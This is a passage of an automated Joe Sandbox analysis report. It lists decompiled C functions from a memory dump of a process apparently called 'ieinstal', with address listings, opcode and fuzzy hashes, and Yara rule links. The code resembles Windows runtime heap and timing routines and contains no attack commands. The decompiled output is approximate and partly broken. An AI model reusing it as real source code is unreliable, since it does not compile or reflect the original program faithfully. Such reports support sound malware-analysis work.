									E1EFCFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_t59 = _v12;
									_t88 =  *((intOrPtr*)(_t59 + 0x48));
									if(_t88 == 0) {
										_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
										E1EFCE740(_t84);
										E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t93);
										goto L19;
									}
									_t64 =  *(_t59 + 0x290);
									_t108 = _t64 - _t75;
									_t75 = _t64;
									if(_t108 > 0) {
										_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
										E1EFCE740(_t84);
										E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t93);
										continue;
									}
									goto L13;
								}
								_t89 = 0xc000009a;
								goto L35;
							}
							_v16 = 1;
							_v8 = 1;
							_t76 =  *( *[fs:0x30] + 0x10);
							_v12 = _t76;
							E1EFCFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
							_t88 =  *((intOrPtr*)(_t76 + 0x48));
							_t75 =  *(_t76 + 0x290);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
							E1EFCE740(1);
							if(_t88 == 0) {
								goto L19;
							}
							goto L9;
						}
						L22:
						return 0xc0000030;
					}
					if(_t91 != 0) {
						goto L22;
					}
					_t86 = _t85 & 0x00000004;
					goto L6;
				}
			}

0x1efead28
0x1efead2b
0x1efead38
0x1f02e184
0x00000000
0x1efead4e
0x1efead53
0x1efead58
0x1efead5b
0x1efead5f
0x1f02e17c
0x1f02e17e
0x00000000
0x00000000
0x00000000
0x1f02e17e
0x1efead65
0x1efead65
0x1efead6a
0x1efeae59
0x1efeae59
0x1efeae5c
0x1efead7b
0x1efead7d
0x1efeae41
0x1efeae43
0x1efeae49
0x1efeae4b
0x1efeae4d
0x00000000
0x1efeae82
0x1efeae52
0x1efeae55
0x1efeae38
0x00000000
0x1efeae38
0x1efead85
0x1efeae69
0x1efeae71
0x1efeae7b
0x1efeadc6
0x1efeadc6
0x1efeadc6
0x1efeadcd
0x1efeadd1
0x00000000
0x00000000
0x1efeaddb
0x1efeae0a
0x1efeae0e
0x1f02e1da
0x1f02e1de
0x1f02e1df
0x1f02e1e0
0x1f02e1e2
0x1f02e1e3
0x1f02e1e4
0x1f02e1ed
0x1f02e1e6
0x1f02e1e6
0x1f02e1e6
0x1f02e1f2
0x1f02e1f4
0x1f02e1f6
0x1efeae33
0x1efeae36
0x00000000
0x1f02e1fc
0x1f02e208
0x1f02e214
0x00000000
0x1f02e214
0x1f02e1f6
0x1efeae17
0x1efeae23
0x1efeae2b
0x1efeae2e
0x1efeae2e
0x00000000
0x1efeae23
0x1efeaddd
0x1efeade7
0x1efeadec
0x1efeadef
0x1efeadf4
0x1f02e1b8
0x1f02e1bb
0x1f02e1cc
0x00000000
0x1f02e1cc
0x1efeadfa
0x1efeae00
0x1efeae02
0x1efeae04
0x1f02e194
0x1f02e197
0x1f02e1a8
0x00000000
0x1f02e1a8
0x00000000
0x1efeae04
0x1f02e20f
0x00000000
0x1f02e20f
0x1efead91
0x1efead94
0x1efead97
0x1efeada0
0x1efeada6
0x1efeadb1
0x1efeadb4
0x1efeadba
0x1efeadbd
0x1efeadc4
0x00000000
0x00000000
0x00000000
0x1efeadc4
0x1efeae62
0x00000000
0x1efeae62
0x1efead72
0x00000000
0x00000000
0x1efead78
0x00000000
0x1efead78

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5182a464c28648d00d46bda124c141606d33a65f9c3509e1367bf70d84f0e3
Instruction ID: cd334159cf12bc006af5e35d9171edce93d2421a25b41c4f71139fc2a7467a09
Opcode Fuzzy Hash: 0e5182a464c28648d00d46bda124c141606d33a65f9c3509e1367bf70d84f0e3
Instruction Fuzzy Hash: C5511036A51A81DBC726DF15C860F1A33B6FF40B54F1646A9ED019BA50D735FC08CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBEF79 Relevance: .2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E1EFBEF79(void* __ecx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				void* _v52;
				void* __ebx;
				signed char _t59;
				intOrPtr _t65;
				signed int _t67;
				void* _t75;
				signed char* _t78;
				intOrPtr _t79;
				signed int _t91;
				signed int _t104;
				void* _t118;
				void* _t128;
				signed int _t135;
				void* _t137;

				_t137 = (_t135 & 0xfffffff8) - 0x14;
				_t128 = __ecx;
				_v20 = 0;
				E1EFC0FB0(__ecx, _t118, 0x1f0b68a0, E1EFC1260, 0, 0);
				if(E1EFBFEDD( &_v24) < 0 ||  *((intOrPtr*)(_t137 + 0x1c)) > 0xa) {
					_t59 = _v20;
				} else {
					_t59 = 3;
					_v20 = _t59;
				}
				_v20 = E1EFBFE40(_t128, _t59);
				_v28 = 0;
				_push(E1EFBF0E1(_t128, 1));
				_push(0x2000);
				_push( &_v20);
				_push(0);
				_push( &_v28);
				_push(0xffffffff);
				if(E1F002B10() < 0) {
					L16:
					_t65 = 0;
					goto L13;
				} else {
					if((_v20 & 0x00000001) != 0) {
						_t67 = 1;
					} else {
						_t67 =  *0x1f0b4360; // 0x10
					}
					_t104 = _t67 * 0x18;
					_t12 = _t104 + 0x7d0; // 0x7d1
					 *((intOrPtr*)(_t137 + 0x18)) = _t12;
					_push(E1EFBF0E1(_t128, 1));
					_push(0x1000);
					_push(_t137 + 0x20);
					_push(0);
					_push( &_v24);
					_push(0xffffffff);
					if(E1F002B10() < 0) {
						 *((intOrPtr*)(_t137 + 0x18)) = 0;
						E1EFBFABA( &_v24, _t137 + 0x18, 0x8000);
						goto L16;
					} else {
						_t75 = E1EFD3C40();
						_t133 = 0x7ffe0380;
						if(_t75 != 0) {
							_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t78 = 0x7ffe0380;
						}
						if( *_t78 != 0) {
							_t79 =  *[fs:0x30];
							__eflags =  *(_t79 + 0x240) & 0x00000001;
							if(( *(_t79 + 0x240) & 0x00000001) == 0) {
								goto L10;
							}
							__eflags = E1EFD3C40();
							if(__eflags != 0) {
								_t133 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							E1F07F1C3(_t104, _t128, _v24, __eflags,  *((intOrPtr*)(_t137 + 0x20)),  *(_t128 + 0x74) << 3,  *_t133 & 0x000000ff);
							E1F07EFD3(_t104, _t128, _v36, _v24, 9);
							goto L10;
						} else {
							L10:
							E1EFBFDB5(_t128, _v24, _v20);
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f4)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f4)) + _v20;
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f8)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f8)) +  *((intOrPtr*)(_t137 + 0x18));
							 *((intOrPtr*)(_v28 + 0x18)) = _v20 + _v28;
							 *((intOrPtr*)(_v28 + 0x14)) =  *((intOrPtr*)(_t137 + 0x18)) + _v28;
							_t35 = _v28 + 0x7d0; // 0x7d0
							 *((intOrPtr*)(_v28 + 0x10)) = _t35 + _t104;
							_t91 =  *0x1f0b6638; // 0x5
							if((_t91 & 0x00000003) == 0) {
								 *0x1f0b6638 = _t91 | 0x00000001;
								E1EFC22A6(_t114);
							}
							 *(_v24 + 0x1b8) = _v20;
							_t65 = _v24;
							L13:
							return _t65;
						}
					}
				}
			}

0x1efbef81
0x1efbef89
0x1efbef97
0x1efbef9b
0x1efbefab
0x1efbefb8
0x1f01db85
0x1f01db87
0x1f01db88
0x1f01db88
0x1efbefc6
0x1efbefcb
0x1efbefd4
0x1efbefd5
0x1efbefde
0x1efbefdf
0x1efbefe4
0x1efbefe5
0x1efbefee
0x1f01dba8
0x1f01dba8
0x00000000
0x1efbeff4
0x1efbeff9
0x1f01dbb1
0x1efbefff
0x1efbefff
0x1efbefff
0x1efbf004
0x1efbf00c
0x1efbf012
0x1efbf01b
0x1efbf01c
0x1efbf025
0x1efbf026
0x1efbf02b
0x1efbf02c
0x1efbf035
0x1f01db9a
0x1f01dba3
0x00000000
0x1efbf03b
0x1efbf03b
0x1efbf040
0x1efbf047
0x1f01dbc0
0x1efbf04d
0x1efbf04d
0x1efbf04d
0x1efbf052
0x1f01dbca
0x1f01dbd0
0x1f01dbd7
0x00000000
0x00000000
0x1f01dbe2
0x1f01dbe4
0x1f01dbef
0x1f01dbef
0x1f01dbef
0x1f01dc0a
0x1f01dc1b
0x00000000
0x1efbf058
0x1efbf058
0x1efbf062
0x1efbf072
0x1efbf083
0x1efbf093
0x1efbf0a0
0x1efbf0a7
0x1efbf0af
0x1efbf0b2
0x1efbf0b9
0x1efbf0be
0x1efbf0c3
0x1efbf0c3
0x1efbf0d0
0x1efbf0d6
0x1efbf0da
0x1efbf0e0
0x1efbf0e0
0x1efbf052
0x1efbf035

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12af57568abff85fdb1539fa5d09e2c554768ea011387a8a284c8b85bf5e406c
Instruction ID: 0a678a3ced6abd7e4d0cdf35026b58e8b09010bffddc592ef851ae0f81b473a5
Opcode Fuzzy Hash: 12af57568abff85fdb1539fa5d09e2c554768ea011387a8a284c8b85bf5e406c
Instruction Fuzzy Hash: 08517D7A6083819FC300DF19C890A5AB7E9EFC8354F144A6EFC95CB291D731E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1F08CDEB Relevance: .2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1F08CDEB(signed int* __ecx, signed int __edx, char _a4, intOrPtr _a8, signed char _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				void* __ebx;
				signed int _t62;
				signed int _t72;
				intOrPtr _t75;
				intOrPtr* _t76;
				void* _t77;
				char* _t81;
				signed int _t85;
				void* _t98;
				intOrPtr _t102;
				void* _t108;
				signed int _t111;
				signed int _t116;
				void* _t123;
				intOrPtr _t126;
				signed int _t129;
				char _t132;

				_t126 = _a8;
				_t132 = _a4;
				_t62 = 2;
				_v32 = _t62;
				_v36 = __edx;
				_v44 = __ecx;
				_v8 = _a12 >> 0x00000016 & _t62;
				asm("sbb eax, eax");
				_v12 = (__ecx[2] & 0) + 0x1ff;
				_t116 = __edx - ( *__ecx & __edx) >> 4 << __ecx[1];
				_v16 = _t116;
				if(_t126 <= 0) {
					_t98 = _t132 - _t126;
				} else {
					_v32 = _v32 & 0x00000000;
					_t98 = _t126 + _t132;
				}
				_t102 = 0;
				while(1) {
					_v20 = _t102;
					if(_t132 >= _t98) {
						break;
					}
					_t129 = _v12 - (_t132 + _t116 & _v12) + 1;
					_t72 = _t98 - _t132;
					if(_t129 >= _t72) {
						_t129 = _t72;
					}
					_a4 = _t132;
					_v40 = _t129;
					_t75 = E1F08D065(_v44, _v36,  &_a4,  &_v40, _v32);
					_v60 = _t75;
					if(_t75 == 0) {
						L23:
						_t132 = _t132 + _t129;
						_t116 = _v16;
						_t102 = _v20 + _t75;
						continue;
					}
					_t119 =  *_v44 & _v36;
					_v24 =  *_v44 & _v36;
					_v28 = _a4 + _v16;
					if(_t75 > 0) {
						_t108 = 0x1000;
						if((_a12 & 0x00000002) != 0) {
							_t108 = 0x40001000;
						}
					} else {
						_t108 = 0x4000;
					}
					_t77 = E1F08C0E6(_v44, _t119, _v28, _v40, _t75, _t108, _v8);
					if(_t77 < 0) {
						L28:
						return _t77;
					} else {
						_t78 = _v48;
						if(_v48 > 0) {
							E1F08D065(_v44, _v36,  &_a4,  &_v40, 1);
							_t78 = _v60;
						}
						E1F08DC08(_v44, _v36, _t78);
						if(E1EFD3C40() == 0) {
							_t81 = 0x7ffe0380;
						} else {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t81 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_t123 = (_v28 << 0xc) + _v24;
							_t111 = _v44[9];
							_t85 = _v40 << 0xc;
							if(_v48 <= 0) {
								E1F07F13E(_t98, _t111, _t123, _t85, 0xd);
							} else {
								E1F07EFD3(_t98, _t111, _t123, _t85, 0xa);
							}
						}
						_t75 = _v48;
						goto L23;
					}
				}
				_t76 = _a16;
				if(_t76 != 0) {
					 *_t76 = _t102;
				}
				_t77 = 0;
				goto L28;
			}

0x1f08cdfc
0x1f08cdff
0x1f08ce07
0x1f08ce0a
0x1f08ce13
0x1f08ce19
0x1f08ce1d
0x1f08ce21
0x1f08ce2d
0x1f08ce3d
0x1f08ce3f
0x1f08ce45
0x1f08ce53
0x1f08ce47
0x1f08ce47
0x1f08ce4c
0x1f08ce4c
0x1f08ce55
0x1f08cf9a
0x1f08cf9a
0x1f08cfa0
0x00000000
0x00000000
0x1f08ce6b
0x1f08ce6c
0x1f08ce70
0x1f08ce72
0x1f08ce72
0x1f08ce88
0x1f08ce8c
0x1f08ce90
0x1f08ce95
0x1f08ce9b
0x1f08cf8e
0x1f08cf92
0x1f08cf94
0x1f08cf98
0x00000000
0x1f08cf98
0x1f08ceaa
0x1f08ceb2
0x1f08ceb6
0x1f08cebc
0x1f08cec9
0x1f08cece
0x1f08ced0
0x1f08ced0
0x1f08cebe
0x1f08cebe
0x1f08cebe
0x1f08cee7
0x1f08ceee
0x1f08cfb1
0x1f08cfb7
0x1f08cef4
0x1f08cef4
0x1f08cefa
0x1f08cf0f
0x1f08cf14
0x1f08cf14
0x1f08cf21
0x1f08cf2d
0x1f08cf3f
0x1f08cf2f
0x1f08cf38
0x1f08cf38
0x1f08cf47
0x1f08cf63
0x1f08cf67
0x1f08cf6e
0x1f08cf76
0x1f08cf85
0x1f08cf78
0x1f08cf7b
0x1f08cf7b
0x1f08cf76
0x1f08cf8a
0x00000000
0x1f08cf8a
0x1f08ceee
0x1f08cfa6
0x1f08cfab
0x1f08cfad
0x1f08cfad
0x1f08cfaf
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
Instruction ID: 017138ec6e2d378c90d81736be92f06531414af2e1cfd42f7092d5e491131bc3
Opcode Fuzzy Hash: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
Instruction Fuzzy Hash: B9516A72A087429FD700CF28C880B5ABBE6FFC8744F048A2DF99597281D734E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBAE40 Relevance: .2, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1EFBAE40(signed int __ebx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t44;
				signed int _t51;
				signed int* _t54;
				signed int _t57;
				signed int _t60;
				signed int _t64;
				void* _t65;
				intOrPtr* _t69;
				signed int _t71;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				void* _t85;
				void* _t90;
				void* _t91;

				_t83 = __esi;
				_t62 = __ebx;
				_push(0x2c);
				_push(0x1f09ba98);
				E1F017BE4(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x19)) = 0;
				_t80 =  *((intOrPtr*)(_t85 + 8));
				if(_t80 == 0) {
					L4:
					_t44 =  *( *[fs:0x30] + 0xc);
					if( *((char*)(_t44 + 0x28)) == 0) {
						_t44 = E1F094A6D(_t62, _t65, _t76, _t80, _t83);
					}
					L5:
					 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0x10));
					return _t44;
				}
				_t90 = _t80 -  *0x1f0b6890; // 0x33307c0
				if(_t90 == 0) {
					goto L4;
				}
				_t91 = _t80 -  *0x1f0b6888; // 0x0
				if(_t91 == 0 ||  *((char*)( *( *[fs:0x30] + 0xc) + 0x28)) != 0) {
					goto L4;
				} else {
					_t8 = _t80 + 0xe0; // 0xe0
					L1EFD2330(_t8, _t8);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t80 + 0xe5));
					if( *((char*)(_t80 + 0xe5)) != 0) {
						E1F094A6D(__ebx, _t65, _t76, _t80, __esi);
						goto L12;
					} else {
						__eflags =  *((char*)(_t80 + 0xe4));
						if( *((char*)(_t80 + 0xe4)) == 0) {
							 *((char*)(_t80 + 0xe4)) = 1;
							_push(_t80);
							_push( *((intOrPtr*)(_t80 + 0x24)));
							E1F004500();
						}
						while(1) {
							_t15 = _t80 + 8; // 0x8
							_t54 = _t15;
							 *(_t85 - 0x20) = _t54;
							_t62 =  *_t54;
							_t71 = _t54[1];
							 *(_t85 - 0x38) = _t62;
							 *(_t85 - 0x34) = _t71;
							while(1) {
								L10:
								__eflags = _t71;
								if(_t71 == 0) {
									break;
								}
								_t83 = _t62;
								_t78 = _t71;
								 *(_t85 - 0x24) = _t78;
								 *(_t85 - 0x34) = _t71 - 1;
								asm("lock cmpxchg8b [edi]");
								_t62 = _t83;
								 *(_t85 - 0x38) = _t62;
								_t71 = _t78;
								 *(_t85 - 0x34) = _t71;
								__eflags = _t62 - _t83;
								_t80 =  *((intOrPtr*)(_t85 + 8));
								if(_t62 != _t83) {
									continue;
								}
								__eflags = _t71 -  *(_t85 - 0x24);
								if(_t71 !=  *(_t85 - 0x24)) {
									continue;
								}
								__eflags = _t71;
								if(_t71 == 0) {
									break;
								}
								_t57 = 0;
								 *(_t85 - 0x28) = 0;
								_t83 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x30) = _t83;
									__eflags = _t83 - 3;
									if(_t83 >= 3) {
										break;
									}
									__eflags = _t57;
									if(_t57 != 0) {
										L40:
										_t83 =  *_t57;
										__eflags = _t83;
										if(_t83 != 0) {
											_t83 =  *(_t83 + 4);
											__eflags = _t83;
											if(_t83 != 0) {
												 *0x1f0b91e0(_t57, _t80);
												 *_t83();
											}
										}
										do {
											_t15 = _t80 + 8; // 0x8
											_t54 = _t15;
											 *(_t85 - 0x20) = _t54;
											_t62 =  *_t54;
											_t71 = _t54[1];
											 *(_t85 - 0x38) = _t62;
											 *(_t85 - 0x34) = _t71;
											goto L10;
										} while (_t57 == 0);
										goto L40;
									}
									_t64 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x2c) = _t64;
										__eflags = _t64 -  *0x1f0b6640; // 0x1
										if(__eflags >= 0) {
											break;
										}
										__eflags = _t57;
										if(_t57 != 0) {
											break;
										}
										_t60 = E1F09523E(_t64, _t64 * 0xc +  *((intOrPtr*)(_t80 + 0x10 + _t83 * 4)), _t78);
										__eflags = _t60;
										if(_t60 == 0) {
											_t57 = 0;
											__eflags = 0;
										} else {
											_t57 = _t60 + 0xfffffff4;
										}
										 *(_t85 - 0x28) = _t57;
										_t64 = _t64 + 1;
									}
									_t83 = _t83 + 1;
								}
								__eflags = _t57;
							}
							 *((intOrPtr*)(_t80 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t80 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x19)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E1EFBAF6D(_t80);
							_t51 = E1EFD3C40();
							__eflags = _t51;
							if(_t51 != 0) {
								_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t44 = 0x7ffe0386;
							}
							__eflags =  *_t44;
							if( *_t44 != 0) {
								_t44 = E1F094D4B(_t80);
							}
							__eflags =  *((char*)(_t85 - 0x19));
							if( *((char*)(_t85 - 0x19)) == 0) {
								goto L5;
							} else {
								__eflags = _t80 -  *0x1f0b6890; // 0x33307c0
								if(__eflags == 0) {
									_t77 = 0x1f0b6894;
									_t69 = 0x1f0b6890;
									L20:
									_t44 = E1EFC2712(_t62, _t69, _t77, _t80, _t83, __eflags);
									goto L5;
								}
								__eflags = _t80 -  *0x1f0b6888; // 0x0
								if(__eflags != 0) {
									_t44 = _t44 | 0xffffffff;
									__eflags = _t44;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t44 = E1EFBB705(_t62, _t80, _t80, _t83, __eflags);
									}
									goto L5;
								}
								_t77 = 0x1f0b688c;
								_t69 = 0x1f0b6888;
								goto L20;
							}
						}
					}
				}
			}

0x1efbae40
0x1efbae40
0x1efbae40
0x1efbae42
0x1efbae47
0x1efbae4c
0x1efbae50
0x1efbae55
0x1efbae76
0x1efbae7c
0x1efbae83
0x1f01cb12
0x1f01cb12
0x1efbae89
0x1efbae8c
0x1efbae98
0x1efbae98
0x1efbae57
0x1efbae5d
0x00000000
0x00000000
0x1efbae5f
0x1efbae65
0x00000000
0x1efbae9b
0x1efbae9b
0x1efbaea2
0x1efbaea7
0x1efbaeab
0x1efbaeb2
0x1f01ca34
0x00000000
0x1efbaeb8
0x1efbaeb8
0x1efbaebf
0x1efbaec1
0x1efbaec8
0x1efbaec9
0x1efbaecc
0x1efbaecc
0x1efbaed1
0x1efbaed1
0x1efbaed1
0x1efbaed4
0x1efbaed7
0x1efbaed9
0x1efbaedc
0x1efbaedf
0x1efbaee2
0x1efbaee2
0x1efbaee2
0x1efbaee4
0x00000000
0x00000000
0x1f01ca3e
0x1f01ca40
0x1f01ca42
0x1f01ca46
0x1f01ca4f
0x1f01ca53
0x1f01ca55
0x1f01ca58
0x1f01ca5a
0x1f01ca5d
0x1f01ca5f
0x1f01ca62
0x00000000
0x00000000
0x1f01ca68
0x1f01ca6b
0x00000000
0x00000000
0x1f01ca71
0x1f01ca73
0x00000000
0x00000000
0x1f01ca79
0x1f01ca7b
0x1f01ca7e
0x1f01ca7e
0x1f01ca80
0x1f01ca80
0x1f01ca83
0x1f01ca86
0x00000000
0x00000000
0x1f01ca88
0x1f01ca8a
0x1f01cac5
0x1f01cac5
0x1f01cac7
0x1f01cac9
0x1f01cacf
0x1f01cad2
0x1f01cad4
0x1f01cade
0x1f01cae4
0x1f01cae4
0x1f01cad4
0x1efbaed1
0x1efbaed1
0x1efbaed1
0x1efbaed4
0x1efbaed7
0x1efbaed9
0x1efbaedc
0x1efbaedf
0x00000000
0x1efbaedf
0x00000000
0x1efbaed1
0x1f01ca8c
0x1f01ca8c
0x1f01ca8e
0x1f01ca8e
0x1f01ca91
0x1f01ca97
0x00000000
0x00000000
0x1f01ca99
0x1f01ca9b
0x00000000
0x00000000
0x1f01caa4
0x1f01caa9
0x1f01caab
0x1f01cab2
0x1f01cab2
0x1f01caad
0x1f01caad
0x1f01caad
0x1f01cab4
0x1f01cab7
0x1f01cab7
0x1f01caba
0x1f01caba
0x1f01cabd
0x1f01cabd
0x1efbaeed
0x1efbaef3
0x1efbaefa
0x1efbaefe
0x1efbaefe
0x1efbaf05
0x1efbaf0a
0x1efbaf0f
0x1efbaf11
0x1f01cafc
0x1efbaf17
0x1efbaf17
0x1efbaf17
0x1efbaf1c
0x1efbaf1f
0x1efbaf7c
0x1efbaf7c
0x1efbaf21
0x1efbaf25
0x00000000
0x1efbaf2b
0x1efbaf2b
0x1efbaf31
0x1efbaf47
0x1efbaf4c
0x1efbaf51
0x1efbaf51
0x00000000
0x1efbaf51
0x1efbaf33
0x1efbaf39
0x1efbaf5b
0x1efbaf5b
0x1efbaf5e
0x1efbaf62
0x1f01cb08
0x1f01cb08
0x00000000
0x1efbaf62
0x1efbaf3b
0x1efbaf40
0x00000000
0x1efbaf40
0x1efbaf25
0x1efbaed1
0x1efbaeb2

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82b2dc0af026a54a956b4d0470bcb979d4d2ec2ad02caa1fd5178719231fbbf1
Instruction ID: 3b2d1dd5018d2f0990af3b02bdf0f17de7febf06edd0187e3af384c9a2fb8a4e
Opcode Fuzzy Hash: 82b2dc0af026a54a956b4d0470bcb979d4d2ec2ad02caa1fd5178719231fbbf1
Instruction Fuzzy Hash: CB51E479A04A91DFCB15DB66C4A07DDB7E2BB44325F15439ADC05EB280D335E844C760

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC3EE2 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1EFC3EE2(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t101 = _t98 + 0xc8;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						L1EFEAB30(E1EFF6010(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E1EFD3C40() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E1F0950B7(_t102, _t98);
						}
						L1EFD2330(_t58, _v44);
						E1EFC79D1(_t102, _t98);
						E1EFC77F9(_t102, _v5);
						return E1EFD24D0(_v44);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1f0b67f0; // 0x0
							_v28 = _t67;
							_t68 =  *0x1f0b67f4; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1f0b67f0; // 0x0
						_t105 = _v28;
						_t80 =  *0x1f0b67f4; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
